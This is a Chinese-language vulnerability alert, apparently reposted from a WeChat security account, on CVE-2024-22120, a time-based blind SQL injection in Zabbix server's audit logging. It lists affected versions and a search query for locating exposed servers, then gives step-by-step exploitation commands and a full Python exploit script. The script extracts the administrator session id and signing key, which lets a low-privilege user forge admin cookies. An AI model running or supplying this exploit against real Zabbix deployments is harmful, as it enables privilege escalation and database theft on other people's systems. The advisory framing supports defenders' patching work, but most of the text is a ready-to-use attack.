Zabbix服务器可以为配置的脚本执行命令。在命令执行后,会在“审计日志”中添加审计记录。由于“clientip”字段未经过清理,可能将SQL注入到“clientip”中,并利用时间盲注攻击。
app="ZABBIX-监控系统"
6.0.0 - 6.0.27 / 6.0.28rc1
6.4.0 - 6.4.12 / 6.4.13rc1
7.0.0alpha1 - 7.0.0beta1 / 7.0.0beta2
登录到权限较低的用户账户。该用户至少应该能够访问1个主机,以便能够对该主机执行命令,如下图所示。
从zbx_session cookie中提取已登录用户的"sessionid"(将其作为base64解码,并从json中获取sessionid)。
提取该用户可用的任何hostid(打开监控->主机,主机id将在响应中)。
执行脚本zabbix_server_time_based_blind_sqli.py,如果需要可以使用--help。在标准情况下,提供"ip"、"sessionid"和"hostid"就足够了:
python3 zabbix_server_time_based_blind_sqli.py --ip 192.168.223.128 --sid a6094b4f052fd133adc335382f0297f6 --hostid 10607 | grep "(+)"
漏洞利用程序的执行时间可能需要大约10分钟,但你会每几秒钟看到进度更新。漏洞利用程序需要这么长时间是因为基于时间的SQL注入,它需要在每次猜测时sleep()一段时间(查看漏洞利用代码)。使用管道(pipe)和grep来过滤输出,否则pwntools会打印过多的调试数据。作为结果,你将获得用于签名zbx_session cookie的管理员session_id和session_key,因此你现在可以生成管理员令牌了。
基于时间的盲SQL注入的PoC步骤如下:
执行“利用步骤”中的步骤1-3(提取低权限用户的sessionid和任何可用的hostid)。
执行漏洞利用程序(将ip、sessionid和hostid替换为你之前步骤中的):
python3 zabbix_server_time_based_blind_sqli.py LOG_LEVEL=error --ip 192.168.223.128 --sid a6094b4f052fd133adc335382f0297f6 --hostid 10607 --poc
你将看到3个请求,后端在响应前分别休眠1秒、5秒和10秒。你将看到请求/响应数据包,以理解休眠发生在后端。
生成Zabbix日志中错误的PoC步骤如下:
执行“利用步骤”中的步骤1-3(提取低权限用户的sessionid和任何可用的hostid)。
执行漏洞利用程序(将ip、sessionid和hostid替换为你之前步骤中的):
python3 zabbix_server_time_based_blind_sqli.py LOG_LEVEL=error --ip 192.168.223.128 --sid a6094b4f052fd133adc335382f0297f6 --hostid 10607 --poc2
检查zabbix_server.log,你将看到查询失败,但是注入了+ version() +,并且其结果出现在适当的位置。
技术细节:
SQL注入漏洞存在于audit.c文件中的zbx_auditlog_global_script函数中:
...
2225: if (ZBX_DB_OK > zbx_db_execute("insert into auditlog (auditid,userid,username,clock,action,ip,resourceid,"
3226: "resourcename,resourcetype,recordsetid,details) values ('%s'," ZBX_FS_UI64 ",'%s',%d,'%d','%s',"
4227: ZBX_FS_UI64 ",'%s',%d,'%s','%s')", auditid_cuid, userid, username, (int)time(NULL),
5228: ZBX_AUDIT_ACTION_EXECUTE, clientip, hostid, hostname, AUDIT_RESOURCE_SCRIPT, auditid_cuid,
6229: details_esc))
7230: {
8231: ret = FAIL;
9232: }
"clientip"字段没有被清理,并且由攻击者控制,因此我们可以在这里插入SQL查询。只有基于时间的SQL注入(Time Based SQLi)才能起作用(参见漏洞利用代码)。
影响:
允许转储数据库中的任何值。例如,上述漏洞利用允许从普通用户权限提升到管理员权限。在某些情况下,SQL注入可能导致远程代码执行(RCE)。
脚本代码:
#!/usr/bin/python3 import json import argparse import pwnlib.context from pwn import * from datetime import datetime def send_message(ip, port, sid, hostid, injection): zbx_header = "ZBXD\x01".encode() #query # insert into auditlog (auditid,userid,username,clock,action,ip,resourceid," # "resourcename,resourcetype,recordsetid,details) values ('%s'," ZBX_FS_UI64 ",'%s',%d,'%d','%s'," # ZBX_FS_UI64 ",'%s',%d,'%s','%s') # message = { "request": "command", "sid": sid, "scriptid": "3", "clientip": "' + " + injection + "+ '", "hostid": hostid } message_json = json.dumps(message) #print("message=%s" % message) message_length = struct.pack('<q', len(message_json)) message = zbx_header + message_length + message_json.encode() #print("Sending message %s" % message) r = remote(ip, port, level='debug') r.send(message) response = r.recv(100) r.close() #print(response) def extract_admin_session_id(ip, port, sid, hostid, time_false, time_true): session_id = "" token_length = 32 for i in range(1, token_length+1): for c in string.digits + "abcdef": print("\n(+) trying c=%s" % c, end="", flush=True) before_query = datetime.now().timestamp() query = "(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false) send_message(ip, port, sid, hostid, query) after_query = datetime.now().timestamp() if time_true > (after_query-before_query) > time_false: continue else: session_id += c print("(+) session_id=%s" % session_id, end="", flush=True) break print("\n") return session_id def extract_config_session_key(ip, port, sid, hostid, time_false, time_true): token = "" token_length = 32 for i in range(1, token_length+1): for c in string.digits + "abcdef": print("\n(+) trying c=%s" % c, end="", flush=True) before_query = datetime.now().timestamp() query = "(select CASE WHEN (ascii(substr((select session_key from config),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false) send_message(ip, port, sid, hostid, query) after_query = datetime.now().timestamp() if time_true > (after_query-before_query) > time_false: continue else: token += c print("(+) session_key=%s" % token, end="", flush=True) break print("\n") return token def tiny_poc(ip, port, sid, hostid): print("(+) Running simple PoC...\n", end="", flush=True) print("(+) Sleeping for 1 sec...\n", end="", flush=True) before_query = datetime.now().timestamp() query = "(select sleep(1))" send_message(ip, port, sid, hostid, query) after_query = datetime.now().timestamp() print("(+) Request time: %d\n" % (after_query-before_query)) print("(+) Sleeping for 5 sec...\n", end="", flush=True) before_query = datetime.now().timestamp() query = "(select sleep(5))" send_message(ip, port, sid, hostid, query) after_query = datetime.now().timestamp() print("(+) Request time: %d\n" % (after_query - before_query)) print("(+) Sleeping for 10 sec...\n", end="", flush=True) before_query = datetime.now().timestamp() query = "(select sleep(10))" send_message(ip, port, sid, hostid, query) after_query = datetime.now().timestamp() print("(+) Request time: %d\n" % (after_query - before_query)) def poc_to_check_in_zabbix_log(ip, port, sid, hostid): print("(+) Sending SQL request for MySQL version...\n", end="", flush=True) query = "(version())" send_message(ip, port, sid, hostid, query) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Command-line option parser example') parser.add_argument("--false_time", help="Time to sleep in case of wrong guess(make it smaller than true time, default=1)", default="1") parser.add_argument("--true_time", help="Time to sleep in case of right guess(make it bigger than false time, default=10)", default="10") parser.add_argument("--ip", help="Zabbix server IP") parser.add_argument("--port", help="Zabbix server port(default=10051)", default="10051") parser.add_argument("--sid", help="Session ID of low privileged user") parser.add_argument("--hostid", help="hostid of any host accessible to user with defined sid") parser.add_argument("--poc", action='store_true', help="Use this key if you want only PoC, PoC will simply make sleep 1,2,5 seconds on mysql server", default=False) parser.add_argument("--poc2", action='store_true', help="Use this key to simply generate error in zabbix logs, check logs later to see results", default=False) args = parser.parse_args() if args.poc: tiny_poc(args.ip, int(args.port), args.sid, args.hostid) elif args.poc2: poc_to_check_in_zabbix_log(args.ip, int(args.port), args.sid, args.hostid) else: print("(+) Extracting Zabbix config session key...\n", end="", flush=True) config_session_key = extract_config_session_key(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time), int(args.true_time)) print("(+) config session_key=%s\n" % config_session_key, end="", flush=True) print("(+) Extracting admin session_id...") admin_sessionid = extract_admin_session_id(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time), int(args.true_time)) print("(+) admin session_id=%s\n" % admin_sessionid, end="", flush=True) print("(+) session_key=%s, admin session_id=%s. Now you can genereate admin zbx_cookie and sign it with session_key" % (config_session_key, admin_sessionid))
原文始发于微信公众号(道一安全):【漏洞预警】CVE-2024-22120 Zabbix 服务时间延迟注入 附利用脚本
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论